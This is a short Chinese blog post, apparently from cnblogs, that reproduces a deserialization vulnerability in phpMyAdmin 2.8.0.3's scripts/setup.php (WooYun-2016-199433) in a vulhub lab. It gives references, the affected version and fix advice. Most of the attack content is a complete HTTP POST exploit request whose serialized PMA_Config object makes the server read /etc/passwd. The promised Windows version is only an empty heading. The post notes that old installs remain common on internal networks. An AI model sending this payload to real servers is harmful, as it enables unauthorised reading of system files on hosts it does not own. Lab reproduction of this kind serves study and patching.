WooYun-2016-199433 -phpmyadmin-反序列化-getshell

 

 

文章参考

http://www.mottoin.com/detail/521.html

https://www.cnblogs.com/xhds/p/12579425.html

 

虽然是很老的漏洞,但在内网大部分都是用着老版本,在外网存在的也为数不少

漏洞文件

/scripts/setup.php

影响版本

已知版本为 2.8.0.3

修复建议

尽快升级到最新版 将setup.php中28行中的"configuration"改为传入其他值 直接删除scripts目录,防止被恶意攻击。

 

环境搭建

https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433

 

 

 

复现

1.构造EXP  (Linux版)

 

 

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

 

2. 构造EXP  (Windows版)

posted @ 2020-04-30 15:58  Null1433  阅读(957)  评论(0编辑  收藏  举报